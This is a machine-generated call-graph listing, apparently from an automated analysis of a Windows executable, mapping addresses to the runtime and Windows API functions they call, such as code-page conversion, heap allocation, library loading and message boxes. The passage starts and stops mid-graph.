7ff7ca7b1952 16626->16628 16629 7ff7ca7aa534 50 API calls 16626->16629 16628->16596 16630 7ff7ca7b193c 16629->16630 16631 7ff7ca7b15d4 65 API calls 16630->16631 16631->16628 16633 7ff7ca7a4178 45 API calls 16632->16633 16634 7ff7ca7b12e8 16633->16634 16635 7ff7ca7b1306 16634->16635 16636 7ff7ca7b12f4 GetOEMCP 16634->16636 16637 7ff7ca7b131b 16635->16637 16638 7ff7ca7b130b GetACP 16635->16638 16636->16637 16637->16599 16637->16600 16638->16637 16640 7ff7ca7b12d4 47 API calls 16639->16640 16641 7ff7ca7b19a9 16640->16641 16642 7ff7ca7b19e6 IsValidCodePage 16641->16642 16648 7ff7ca7b1aff 16641->16648 16649 7ff7ca7b1a00 __scrt_get_show_window_mode 16641->16649 16644 7ff7ca7b19f7 16642->16644 16642->16648 16643 7ff7ca79b870 _log10_special 8 API calls 16645 7ff7ca7b1741 16643->16645 16646 7ff7ca7b1a26 GetCPInfo 16644->16646 16644->16649 16645->16607 16645->16612 16646->16648 16646->16649 16648->16643 16666 7ff7ca7b13ec 16649->16666 16753 7ff7ca7af5e8 EnterCriticalSection 16650->16753 16667 7ff7ca7b1429 GetCPInfo 16666->16667 16668 7ff7ca7b151f 16666->16668 16667->16668 16673 7ff7ca7b143c 16667->16673 16669 7ff7ca79b870 _log10_special 8 API calls 16668->16669 16670 7ff7ca7b15be 16669->16670 16670->16648 16677 7ff7ca7b2150 16673->16677 16678 7ff7ca7a4178 45 API calls 16677->16678 16679 7ff7ca7b2192 16678->16679 16697 7ff7ca7aebb0 16679->16697 16699 7ff7ca7aebb9 MultiByteToWideChar 16697->16699 16755 7ff7ca7a8661 16754->16755 16756 7ff7ca7a87c5 16754->16756 16755->16569 16757 7ff7ca7a87ee 16756->16757 16758 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16756->16758 16759 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16757->16759 16758->16756 16759->16755 16761 7ff7ca7b55d1 16760->16761 16762 7ff7ca7b55e8 16760->16762 16763 7ff7ca7a43f4 _get_daylight 11 API calls 16761->16763 16762->16761 16765 7ff7ca7b55f6 16762->16765 16764 7ff7ca7b55d6 16763->16764 16766 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16764->16766 16767 7ff7ca7a4178 45 API calls 16765->16767 16768 7ff7ca7b55e1 16765->16768 16766->16768 16767->16768 16768->16428 16770 7ff7ca7a4178 45 API calls 16769->16770 16771 7ff7ca7b8281 16770->16771 16774 7ff7ca7b7ed8 16771->16774 16776 7ff7ca7b7f26 16774->16776 16775 7ff7ca79b870 _log10_special 8 API calls 16777 7ff7ca7b6515 16775->16777 16778 7ff7ca7b7fad 16776->16778 16780 7ff7ca7b7f98 GetCPInfo 16776->16780 16783 7ff7ca7b7fb1 16776->16783 16777->16428 16777->16432 16779 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16778->16779 16778->16783 16781 7ff7ca7b8045 16779->16781 16780->16778 16780->16783 16782 7ff7ca7ac90c _fread_nolock 12 API calls 16781->16782 16781->16783 16784 7ff7ca7b807c 16781->16784 16782->16784 16783->16775 16784->16783 16785 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16784->16785 16786 7ff7ca7b80ea 16785->16786 16787 7ff7ca7b81cc 16786->16787 16788 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16786->16788 16787->16783 16789 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16787->16789 16790 7ff7ca7b8110 16788->16790 16789->16783 16790->16787 16791 7ff7ca7ac90c _fread_nolock 12 API calls 16790->16791 16792 7ff7ca7b813d 16790->16792 16791->16792 16792->16787 16793 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16792->16793 16794 7ff7ca7b81b4 16793->16794 16795 7ff7ca7b81d4 16794->16795 16796 7ff7ca7b81ba 16794->16796 16803 7ff7ca7ae278 16795->16803 16796->16787 16798 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16796->16798 16798->16787 16800 7ff7ca7b8213 16800->16783 16802 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16800->16802 16801 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16801->16800 16802->16783 16804 7ff7ca7ae020 __crtLCMapStringW 5 API calls 16803->16804 16805 7ff7ca7ae2b6 16804->16805 16806 7ff7ca7ae2be 16805->16806 16807 7ff7ca7ae4e0 __crtLCMapStringW 5 API calls 16805->16807 16806->16800 16806->16801 16808 7ff7ca7ae327 CompareStringW 16807->16808 16808->16806 16810 7ff7ca7b6f51 16809->16810 16811 7ff7ca7b6f6a HeapSize 16809->16811 16812 7ff7ca7a43f4 _get_daylight 11 API calls 16810->16812 16813 7ff7ca7b6f56 16812->16813 16814 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 16813->16814 16815 7ff7ca7b6f61 16814->16815 16815->16436 16817 7ff7ca7b6fa3 16816->16817 16818 7ff7ca7b6f99 16816->16818 16819 7ff7ca7b6faf _get_daylight 16817->16819 16820 7ff7ca7b6fa8 16817->16820 16821 7ff7ca7ac90c _fread_nolock 12 API calls 16818->16821 16823 7ff7ca7b6fe2 HeapReAlloc 16819->16823 16824 7ff7ca7b6fb5 16819->16824 16827 7ff7ca7b28a0 _get_daylight 2 API calls 16819->16827 16822 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16820->16822 16825 7ff7ca7b6fa1 16821->16825 16822->16825 16823->16819 16823->16825 16826 7ff7ca7a43f4 _get_daylight 11 API calls 16824->16826 16825->16441 16826->16825 16827->16819 16829 7ff7ca7ae020 __crtLCMapStringW 5 API calls 16828->16829 16830 7ff7ca7ae254 16829->16830 16830->16445 16832 7ff7ca7a47e6 16831->16832 16833 7ff7ca7a480a 16831->16833 16837 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16832->16837 16841 7ff7ca7a47f5 16832->16841 16834 7ff7ca7a480f 16833->16834 16835 7ff7ca7a4864 16833->16835 16838 7ff7ca7a4824 16834->16838 16834->16841 16842 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16834->16842 16836 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16835->16836 16848 7ff7ca7a4880 16836->16848 16837->16841 16839 7ff7ca7ac90c _fread_nolock 12 API calls 16838->16839 16839->16841 16840 7ff7ca7a4887 GetLastError 16843 7ff7ca7a4368 _fread_nolock 11 API calls 16840->16843 16841->16449 16841->16450 16842->16838 16846 7ff7ca7a4894 16843->16846 16844 7ff7ca7a48c2 16844->16841 16845 7ff7ca7aebb0 _fread_nolock MultiByteToWideChar 16844->16845 16850 7ff7ca7a4906 16845->16850 16851 7ff7ca7a43f4 _get_daylight 11 API calls 16846->16851 16847 7ff7ca7a48b5 16849 7ff7ca7ac90c _fread_nolock 12 API calls 16847->16849 16848->16840 16848->16844 16848->16847 16852 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16848->16852 16849->16844 16850->16840 16850->16841 16851->16841 16852->16847 16854 7ff7ca7a853d 16853->16854 16861 7ff7ca7a8539 16853->16861 16874 7ff7ca7b1d4c GetEnvironmentStringsW 16854->16874 16857 7ff7ca7a8556 16881 7ff7ca7a86a4 16857->16881 16858 7ff7ca7a854a 16859 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16858->16859 16859->16861 16861->16480 16866 7ff7ca7a88e4 16861->16866 16863 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16864 7ff7ca7a857d 16863->16864 16865 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16864->16865 16865->16861 16867 7ff7ca7a891e 16866->16867 16868 7ff7ca7a8907 16866->16868 16867->16868 16869 7ff7ca7adea8 _get_daylight 11 API calls 16867->16869 16870 7ff7ca7a8992 16867->16870 16871 7ff7ca7aebb0 MultiByteToWideChar _fread_nolock 16867->16871 16873 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16867->16873 16868->16480 16869->16867 16872 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16870->16872 16871->16867 16872->16868 16873->16867 16875 7ff7ca7b1d70 16874->16875 16876 7ff7ca7a8542 16874->16876 16877 7ff7ca7ac90c _fread_nolock 12 API calls 16875->16877 16876->16857 16876->16858 16880 7ff7ca7b1da7 memcpy_s 16877->16880 16878 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16879 7ff7ca7b1dc7 FreeEnvironmentStringsW 16878->16879 16879->16876 16880->16878 16882 7ff7ca7a86cc 16881->16882 16883 7ff7ca7adea8 _get_daylight 11 API calls 16882->16883 16894 7ff7ca7a8707 16883->16894 16884 7ff7ca7a870f 16885 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16884->16885 16886 7ff7ca7a855e 16885->16886 16886->16863 16887 7ff7ca7a8789 16888 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16887->16888 16888->16886 16889 7ff7ca7adea8 _get_daylight 11 API calls 16889->16894 16890 7ff7ca7a8778 16891 7ff7ca7a87c0 11 API calls 16890->16891 16893 7ff7ca7a8780 16891->16893 16892 7ff7ca7af784 37 API calls 16892->16894 16896 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16893->16896 16894->16884 16894->16887 16894->16889 16894->16890 16894->16892 16895 7ff7ca7a87ac 16894->16895 16897 7ff7ca7a9c58 __free_lconv_mon 11 API calls 16894->16897 16898 7ff7ca7a9c10 _isindst 17 API calls 16895->16898 16896->16884 16897->16894 16899 7ff7ca7a87be 16898->16899 16901 7ff7ca7b7e41 __crtLCMapStringW 16900->16901 16902 7ff7ca7ae278 6 API calls 16901->16902 16903 7ff7ca7b63fe 16901->16903 16902->16903 16903->16503 16903->16505 16904 7ff7ca79bf5c 16925 7ff7ca79c12c 16904->16925 16907 7ff7ca79c0a8 17048 7ff7ca79c44c IsProcessorFeaturePresent 16907->17048 16908 7ff7ca79bf78 __scrt_acquire_startup_lock 16910 7ff7ca79c0b2 16908->16910 16917 7ff7ca79bf96 __scrt_release_startup_lock 16908->16917 16911 7ff7ca79c44c 7 API calls 16910->16911 16913 7ff7ca79c0bd __GetCurrentState 16911->16913 16912 7ff7ca79bfbb 16914 7ff7ca79c041 16931 7ff7ca79c594 16914->16931 16916 7ff7ca79c046 16934 7ff7ca791000 16916->16934 16917->16912 16917->16914 17037 7ff7ca7a8e44 16917->17037 16922 7ff7ca79c069 16922->16913 17044 7ff7ca79c2b0 16922->17044 16926 7ff7ca79c134 16925->16926 16927 7ff7ca79c140 __scrt_dllmain_crt_thread_attach 16926->16927 16928 7ff7ca79bf70 16927->16928 16929 7ff7ca79c14d 16927->16929 16928->16907 16928->16908 16929->16928 17055 7ff7ca79cba8 16929->17055 16932 7ff7ca7b97e0 __scrt_get_show_window_mode 16931->16932 16933 7ff7ca79c5ab GetStartupInfoW 16932->16933 16933->16916 16935 7ff7ca791009 16934->16935 17082 7ff7ca7a4794 16935->17082 16937 7ff7ca79352b 17089 7ff7ca7933e0 16937->17089 16942 7ff7ca79b870 _log10_special 8 API calls 16945 7ff7ca79372a 16942->16945 16943 7ff7ca793736 17280 7ff7ca793f70 16943->17280 16944 7ff7ca79356c 16947 7ff7ca791bf0 49 API calls 16944->16947 17042 7ff7ca79c5d8 GetModuleHandleW 16945->17042 16965 7ff7ca793588 16947->16965 16949 7ff7ca793785 16951 7ff7ca7925f0 53 API calls 16949->16951 17028 7ff7ca793538 16951->17028 16953 7ff7ca793778 16955 7ff7ca79379f 16953->16955 16956 7ff7ca79377d 16953->16956 16954 7ff7ca79365f __std_exception_copy 16957 7ff7ca793834 16954->16957 16960 7ff7ca797e10 14 API calls 16954->16960 16959 7ff7ca791bf0 49 API calls 16955->16959 17299 7ff7ca79f36c 16956->17299 16986 7ff7ca793805 __std_exception_copy 16957->16986 17303 7ff7ca793e90 16957->17303 16962 7ff7ca7937be 16959->16962 16963 7ff7ca7936ae 16960->16963 16969 7ff7ca7918f0 115 API calls 16962->16969 17164 7ff7ca797f80 16963->17164 16964 7ff7ca793852 16967 7ff7ca793871 16964->16967 16968 7ff7ca793865 16964->16968 17151 7ff7ca797e10 16965->17151 16972 7ff7ca791bf0 49 API calls 16967->16972 17306 7ff7ca793fe0 16968->17306 16973 7ff7ca7937df 16969->16973 16970 7ff7ca7936bd 16974 7ff7ca79380f 16970->16974 16976 7ff7ca7936cf 16970->16976 16972->16986 16973->16965 16975 7ff7ca7937ef 16973->16975 17173 7ff7ca798400 16974->17173 16979 7ff7ca7925f0 53 API calls 16975->16979 17169 7ff7ca791bf0 16976->17169 16979->17028 16982 7ff7ca79389e SetDllDirectoryW 16985 7ff7ca7938c3 16982->16985 16989 7ff7ca793a50 16985->16989 17229 7ff7ca796560 16985->17229 17224 7ff7ca7986b0 16986->17224 16987 7ff7ca7936fc 17269 7ff7ca7925f0 16987->17269 16993 7ff7ca793a5a PostMessageW GetMessageW 16989->16993 16994 7ff7ca793a7d 16989->16994 16993->16994 17364 7ff7ca793080 16994->17364 16996 7ff7ca7938ea 16998 7ff7ca793947 16996->16998 17000 7ff7ca793901 16996->17000 17309 7ff7ca7965a0 16996->17309 16998->16989 17005 7ff7ca79395c 16998->17005 17012 7ff7ca793905 17000->17012 17330 7ff7ca796970 17000->17330 17249 7ff7ca7930e0 17005->17249 17007 7ff7ca796780 FreeLibrary 17012->16998 17346 7ff7ca792870 17012->17346 17028->16942 17038 7ff7ca7a8e5b 17037->17038 17039 7ff7ca7a8e7c 17037->17039 17038->16914 17040 7ff7ca7a96e8 45 API calls 17039->17040 17041 7ff7ca7a8e81 17040->17041 17043 7ff7ca79c5e9 17042->17043 17043->16922 17046 7ff7ca79c2c1 17044->17046 17045 7ff7ca79c080 17045->16912 17046->17045 17047 7ff7ca79cba8 7 API calls 17046->17047 17047->17045 17049 7ff7ca79c472 _isindst __scrt_get_show_window_mode 17048->17049 17050 7ff7ca79c491 RtlCaptureContext RtlLookupFunctionEntry 17049->17050 17051 7ff7ca79c4f6 __scrt_get_show_window_mode 17050->17051 17052 7ff7ca79c4ba RtlVirtualUnwind 17050->17052 17053 7ff7ca79c528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17051->17053 17052->17051 17054 7ff7ca79c576 _isindst 17053->17054 17054->16910 17056 7ff7ca79cbb0 17055->17056 17057 7ff7ca79cbba 17055->17057 17061 7ff7ca79cf44 17056->17061 17057->16928 17062 7ff7ca79cbb5 17061->17062 17063 7ff7ca79cf53 17061->17063 17065 7ff7ca79cfb0 17062->17065 17069 7ff7ca79d180 17063->17069 17066 7ff7ca79cfdb 17065->17066 17067 7ff7ca79cfdf 17066->17067 17068 7ff7ca79cfbe DeleteCriticalSection 17066->17068 17067->17057 17068->17066 17073 7ff7ca79cfe8 17069->17073 17074 7ff7ca79d0d2 TlsFree 17073->17074 17080 7ff7ca79d02c __vcrt_InitializeCriticalSectionEx 17073->17080 17075 7ff7ca79d05a LoadLibraryExW 17077 7ff7ca79d0f9 17075->17077 17078 7ff7ca79d07b GetLastError 17075->17078 17076 7ff7ca79d119 GetProcAddress 17076->17074 17077->17076 17079 7ff7ca79d110 FreeLibrary 17077->17079 17078->17080 17079->17076 17080->17074 17080->17075 17080->17076 17081 7ff7ca79d09d LoadLibraryExW 17080->17081 17081->17077 17081->17080 17085 7ff7ca7ae790 17082->17085 17083 7ff7ca7ae7e3 17084 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17083->17084 17088 7ff7ca7ae80c 17084->17088 17085->17083 17086 7ff7ca7ae836 17085->17086 17377 7ff7ca7ae668 17086->17377 17088->16937 17385 7ff7ca79bb70 17089->17385 17092 7ff7ca793438 17387 7ff7ca7985a0 FindFirstFileExW 17092->17387 17093 7ff7ca79341b 17392 7ff7ca7929e0 17093->17392 17096 7ff7ca79342e 17101 7ff7ca79b870 _log10_special 8 API calls 17096->17101 17098 7ff7ca7934a5 17411 7ff7ca798760 17098->17411 17099 7ff7ca79344b 17402 7ff7ca798620 CreateFileW 17099->17402 17104 7ff7ca7934dd 17101->17104 17104->17028 17111 7ff7ca7918f0 17104->17111 17105 7ff7ca7934b3 17105->17096 17109 7ff7ca7926c0 49 API calls 17105->17109 17106 7ff7ca793474 __vcrt_InitializeCriticalSectionEx 17106->17098 17107 7ff7ca79345c 17405 7ff7ca7926c0 17107->17405 17109->17096 17112 7ff7ca793f70 108 API calls 17111->17112 17114 7ff7ca791925 17112->17114 17113 7ff7ca791bb6 17115 7ff7ca79b870 _log10_special 8 API calls 17113->17115 17114->17113 17116 7ff7ca7976a0 83 API calls 17114->17116 17118 7ff7ca791bd1 17115->17118 17117 7ff7ca79196b 17116->17117 17150 7ff7ca79199c 17117->17150 17756 7ff7ca79f9f4 17117->17756 17118->16943 17118->16944 17120 7ff7ca79f36c 74 API calls 17120->17113 17121 7ff7ca791985 17122 7ff7ca7919a1 17121->17122 17123 7ff7ca791989 17121->17123 17760 7ff7ca79f6bc 17122->17760 17763 7ff7ca792760 17123->17763 17127 7ff7ca7919bf 17129 7ff7ca792760 53 API calls 17127->17129 17128 7ff7ca7919d7 17130 7ff7ca791a06 17128->17130 17131 7ff7ca7919ee 17128->17131 17129->17150 17133 7ff7ca791bf0 49 API calls 17130->17133 17132 7ff7ca792760 53 API calls 17131->17132 17132->17150 17134 7ff7ca791a1d 17133->17134 17135 7ff7ca791bf0 49 API calls 17134->17135 17136 7ff7ca791a68 17135->17136 17137 7ff7ca79f9f4 73 API calls 17136->17137 17138 7ff7ca791a8c 17137->17138 17139 7ff7ca791aa1 17138->17139 17140 7ff7ca791ab9 17138->17140 17142 7ff7ca792760 53 API calls 17139->17142 17141 7ff7ca79f6bc _fread_nolock 53 API calls 17140->17141 17143 7ff7ca791ace 17141->17143 17142->17150 17144 7ff7ca791ad4 17143->17144 17145 7ff7ca791aec 17143->17145 17146 7ff7ca792760 53 API calls 17144->17146 17780 7ff7ca79f430 17145->17780 17146->17150 17149 7ff7ca7925f0 53 API calls 17149->17150 17150->17120 17150->17150 17152 7ff7ca797e1a 17151->17152 17153 7ff7ca7986b0 2 API calls 17152->17153 17154 7ff7ca797e39 GetEnvironmentVariableW 17153->17154 17155 7ff7ca797ea2 17154->17155 17156 7ff7ca797e56 ExpandEnvironmentStringsW 17154->17156 17157 7ff7ca79b870 _log10_special 8 API calls 17155->17157 17156->17155 17158 7ff7ca797e78 17156->17158 17159 7ff7ca797eb4 17157->17159 17160 7ff7ca798760 2 API calls 17158->17160 17159->16954 17161 7ff7ca797e8a 17160->17161 17162 7ff7ca79b870 _log10_special 8 API calls 17161->17162 17163 7ff7ca797e9a 17162->17163 17163->16954 17165 7ff7ca7986b0 2 API calls 17164->17165 17166 7ff7ca797f94 17165->17166 17986 7ff7ca7a7548 17166->17986 17168 7ff7ca797fa6 __std_exception_copy 17168->16970 17170 7ff7ca791c15 17169->17170 17171 7ff7ca7a3ca4 49 API calls 17170->17171 17172 7ff7ca791c38 17171->17172 17172->16986 17172->16987 17174 7ff7ca798415 17173->17174 18004 7ff7ca797b50 GetCurrentProcess OpenProcessToken 17174->18004 17177 7ff7ca797b50 7 API calls 17178 7ff7ca798441 17177->17178 17179 7ff7ca798474 17178->17179 17180 7ff7ca79845a 17178->17180 17182 7ff7ca792590 48 API calls 17179->17182 17181 7ff7ca792590 48 API calls 17180->17181 17183 7ff7ca798472 17181->17183 17184 7ff7ca798487 LocalFree LocalFree 17182->17184 17183->17184 17185 7ff7ca7984af 17184->17185 17186 7ff7ca7984a3 17184->17186 17225 7ff7ca7986f6 17224->17225 17226 7ff7ca7986d2 MultiByteToWideChar 17224->17226 17227 7ff7ca798713 MultiByteToWideChar 17225->17227 17228 7ff7ca79870c __std_exception_copy 17225->17228 17226->17225 17226->17228 17227->17228 17228->16982 17230 7ff7ca796575 17229->17230 17231 7ff7ca7938d5 17230->17231 17232 7ff7ca792760 53 API calls 17230->17232 17233 7ff7ca796b00 17231->17233 17232->17231 17234 7ff7ca796b30 17233->17234 17235 7ff7ca796b4a __std_exception_copy 17233->17235 17234->17235 18189 7ff7ca791440 17234->18189 17235->16996 17237 7ff7ca796b54 17237->17235 17238 7ff7ca793fe0 49 API calls 17237->17238 17239 7ff7ca796b76 17238->17239 17240 7ff7ca796b7b 17239->17240 17241 7ff7ca793fe0 49 API calls 17239->17241 17242 7ff7ca792870 53 API calls 17240->17242 17243 7ff7ca796b9a 17241->17243 17242->17235 17243->17240 17244 7ff7ca793fe0 49 API calls 17243->17244 17245 7ff7ca796bb6 17244->17245 17245->17240 17261 7ff7ca7930ee __scrt_get_show_window_mode 17249->17261 17250 7ff7ca79b870 _log10_special 8 API calls 17251 7ff7ca79338e 17250->17251 17251->17028 17268 7ff7ca7983e0 LocalFree 17251->17268 17252 7ff7ca7932e7 17252->17250 17254 7ff7ca791bf0 49 API calls 17254->17261 17255 7ff7ca793309 17257 7ff7ca7925f0 53 API calls 17255->17257 17257->17252 17260 7ff7ca7932e9 17263 7ff7ca7925f0 53 API calls 17260->17263 17261->17252 17261->17254 17261->17255 17261->17260 17262 7ff7ca792870 53 API calls 17261->17262 17266 7ff7ca7932f7 17261->17266 18250 7ff7ca793f10 17261->18250 18256 7ff7ca797530 17261->18256 18268 7ff7ca7915c0 17261->18268 18306 7ff7ca7968e0 17261->18306 18310 7ff7ca793b40 17261->18310 18354 7ff7ca793e00 17261->18354 17262->17261 17263->17252 17267 7ff7ca7925f0 53 API calls 17266->17267 17267->17252 17270 7ff7ca79262a 17269->17270 17271 7ff7ca7a3ca4 49 API calls 17270->17271 17272 7ff7ca792652 17271->17272 17273 7ff7ca7986b0 2 API calls 17272->17273 17281 7ff7ca793f7c 17280->17281 17282 7ff7ca7986b0 2 API calls 17281->17282 17283 7ff7ca793fa4 17282->17283 17284 7ff7ca7986b0 2 API calls 17283->17284 17285 7ff7ca793fb7 17284->17285 18474 7ff7ca7a52a4 17285->18474 17288 7ff7ca79b870 _log10_special 8 API calls 17289 7ff7ca793746 17288->17289 17289->16949 17290 7ff7ca7976a0 17289->17290 17291 7ff7ca7976c4 17290->17291 17292 7ff7ca79f9f4 73 API calls 17291->17292 17297 7ff7ca79779b __std_exception_copy 17291->17297 17293 7ff7ca7976e0 17292->17293 17293->17297 18865 7ff7ca7a6bd8 17293->18865 17295 7ff7ca79f9f4 73 API calls 17298 7ff7ca7976f5 17295->17298 17296 7ff7ca79f6bc _fread_nolock 53 API calls 17296->17298 17297->16953 17298->17295 17298->17296 17298->17297 17300 7ff7ca79f39c 17299->17300 18880 7ff7ca79f148 17300->18880 17302 7ff7ca79f3b5 17302->16949 17304 7ff7ca791bf0 49 API calls 17303->17304 17305 7ff7ca793ead 17304->17305 17305->16964 17307 7ff7ca791bf0 49 API calls 17306->17307 17308 7ff7ca794010 17307->17308 17308->16986 17327 7ff7ca7965bc 17309->17327 17310 7ff7ca7966df 17311 7ff7ca79b870 _log10_special 8 API calls 17310->17311 17313 7ff7ca7966f1 17311->17313 17312 7ff7ca7917e0 45 API calls 17312->17327 17313->17000 17314 7ff7ca79675d 17316 7ff7ca7925f0 53 API calls 17314->17316 17315 7ff7ca791bf0 49 API calls 17315->17327 17316->17310 17317 7ff7ca79674a 17318 7ff7ca7925f0 53 API calls 17317->17318 17318->17310 17319 7ff7ca793f10 10 API calls 17319->17327 17320 7ff7ca79670d 17322 7ff7ca7925f0 53 API calls 17320->17322 17321 7ff7ca797530 52 API calls 17321->17327 17322->17310 17323 7ff7ca792870 53 API calls 17323->17327 17324 7ff7ca796737 17325 7ff7ca7925f0 53 API calls 17324->17325 17325->17310 17326 7ff7ca7915c0 118 API calls 17326->17327 17327->17310 17327->17312 17327->17314 17327->17315 17327->17317 17327->17319 17327->17320 17327->17321 17327->17323 17327->17324 17327->17326 17328 7ff7ca796720 17327->17328 17329 7ff7ca7925f0 53 API calls 17328->17329 17329->17310 18891 7ff7ca7981a0 17330->18891 17332 7ff7ca796989 17333 7ff7ca7981a0 3 API calls 17332->17333 17334 7ff7ca79699c 17333->17334 17335 7ff7ca7969cf 17334->17335 17337 7ff7ca7969b4 17334->17337 17336 7ff7ca7925f0 53 API calls 17335->17336 18895 7ff7ca796ea0 GetProcAddress 17337->18895 17347 7ff7ca7928aa 17346->17347 17348 7ff7ca7a3ca4 49 API calls 17347->17348 17349 7ff7ca7928d2 17348->17349 17350 7ff7ca7986b0 2 API calls 17349->17350 17351 7ff7ca7928ea 17350->17351 17352 7ff7ca7928f7 MessageBoxW 17351->17352 17353 7ff7ca79290e MessageBoxA 17351->17353 17354 7ff7ca792920 17352->17354 17353->17354 17355 7ff7ca79b870 _log10_special 8 API calls 17354->17355 17356 7ff7ca792930 17355->17356 18960 7ff7ca795af0 17364->18960 17372 7ff7ca7930b9 17373 7ff7ca7933a0 17372->17373 17374 7ff7ca7933ae 17373->17374 17375 7ff7ca7933bf 17374->17375 19233 7ff7ca798180 FreeLibrary 17374->19233 17375->17007 17384 7ff7ca7a477c EnterCriticalSection 17377->17384 17386 7ff7ca7933ec GetModuleFileNameW 17385->17386 17386->17092 17386->17093 17388 7ff7ca7985df FindClose 17387->17388 17389 7ff7ca7985f2 17387->17389 17388->17389 17390 7ff7ca79b870 _log10_special 8 API calls 17389->17390 17391 7ff7ca793442 17390->17391 17391->17098 17391->17099 17393 7ff7ca79bb70 17392->17393 17394 7ff7ca7929fc GetLastError 17393->17394 17395 7ff7ca792a29 17394->17395 17416 7ff7ca7a3ef8 17395->17416 17400 7ff7ca79b870 _log10_special 8 API calls 17401 7ff7ca792ae5 17400->17401 17401->17096 17403 7ff7ca798660 GetFinalPathNameByHandleW CloseHandle 17402->17403 17404 7ff7ca793458 17402->17404 17403->17404 17404->17106 17404->17107 17406 7ff7ca7926fa 17405->17406 17407 7ff7ca7a3ef8 48 API calls 17406->17407 17408 7ff7ca792722 MessageBoxW 17407->17408 17409 7ff7ca79b870 _log10_special 8 API calls 17408->17409 17410 7ff7ca79274c 17409->17410 17410->17096 17412 7ff7ca79878a WideCharToMultiByte 17411->17412 17414 7ff7ca7987b5 17411->17414 17412->17414 17415 7ff7ca7987cb __std_exception_copy 17412->17415 17413 7ff7ca7987d2 WideCharToMultiByte 17413->17415 17414->17413 17414->17415 17415->17105 17420 7ff7ca7a3f52 17416->17420 17417 7ff7ca7a3f77 17418 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17417->17418 17422 7ff7ca7a3fa1 17418->17422 17419 7ff7ca7a3fb3 17438 7ff7ca7a22b0 17419->17438 17420->17417 17420->17419 17424 7ff7ca79b870 _log10_special 8 API calls 17422->17424 17423 7ff7ca7a4094 17425 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17423->17425 17427 7ff7ca792a54 FormatMessageW 17424->17427 17425->17422 17434 7ff7ca792590 17427->17434 17428 7ff7ca7a40ba 17428->17423 17430 7ff7ca7a40c4 17428->17430 17429 7ff7ca7a4069 17431 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17429->17431 17433 7ff7ca7a9c58 __free_lconv_mon 11 API calls 17430->17433 17431->17422 17432 7ff7ca7a4060 17432->17423 17432->17429 17433->17422 17435 7ff7ca7925b5 17434->17435 17436 7ff7ca7a3ef8 48 API calls 17435->17436 17437 7ff7ca7925d8 MessageBoxW 17436->17437 17437->17400 17439 7ff7ca7a22ee 17438->17439 17440 7ff7ca7a22de 17438->17440 17441 7ff7ca7a22f7 17439->17441 17445 7ff7ca7a2325 17439->17445 17444 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17440->17444 17442 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17441->17442 17443 7ff7ca7a231d 17442->17443 17443->17423 17443->17428 17443->17429 17443->17432 17444->17443 17445->17440 17445->17443 17449 7ff7ca7a2cc4 17445->17449 17482 7ff7ca7a2710 17445->17482 17519 7ff7ca7a1ea0 17445->17519 17450 7ff7ca7a2d06 17449->17450 17451 7ff7ca7a2d77 17449->17451 17452 7ff7ca7a2da1 17450->17452 17453 7ff7ca7a2d0c 17450->17453 17454 7ff7ca7a2dd0 17451->17454 17455 7ff7ca7a2d7c 17451->17455 17542 7ff7ca7a1074 17452->17542 17456 7ff7ca7a2d40 17453->17456 17457 7ff7ca7a2d11 17453->17457 17461 7ff7ca7a2de7 17454->17461 17463 7ff7ca7a2dda 17454->17463 17467 7ff7ca7a2ddf 17454->17467 17458 7ff7ca7a2db1 17455->17458 17459 7ff7ca7a2d7e 17455->17459 17464 7ff7ca7a2d17 17456->17464 17456->17467 17457->17461 17457->17464 17549 7ff7ca7a0c64 17458->17549 17462 7ff7ca7a2d20 17459->17462 17471 7ff7ca7a2d8d 17459->17471 17556 7ff7ca7a39cc 17461->17556 17481 7ff7ca7a2e10 17462->17481 17522 7ff7ca7a3478 17462->17522 17463->17452 17463->17467 17464->17462 17470 7ff7ca7a2d52 17464->17470 17479 7ff7ca7a2d3b 17464->17479 17467->17481 17560 7ff7ca7a1484 17467->17560 17470->17481 17532 7ff7ca7a37b4 17470->17532 17471->17452 17473 7ff7ca7a2d92 17471->17473 17473->17481 17538 7ff7ca7a3878 17473->17538 17474 7ff7ca79b870 _log10_special 8 API calls 17475 7ff7ca7a310a 17474->17475 17475->17445 17477 7ff7ca7a2ffc 17477->17481 17573 7ff7ca7add18 17477->17573 17479->17477 17479->17481 17567 7ff7ca7a3ae0 17479->17567 17481->17474 17483 7ff7ca7a2734 17482->17483 17484 7ff7ca7a271e 17482->17484 17487 7ff7ca7a2774 17483->17487 17488 7ff7ca7a9b24 _invalid_parameter_noinfo 37 API calls 17483->17488 17485 7ff7ca7a2d06 17484->17485 17486 7ff7ca7a2d77 17484->17486 17484->17487 17489 7ff7ca7a2da1 17485->17489 17490 7ff7ca7a2d0c 17485->17490 17491 7ff7ca7a2dd0 17486->17491 17492 7ff7ca7a2d7c 17486->17492 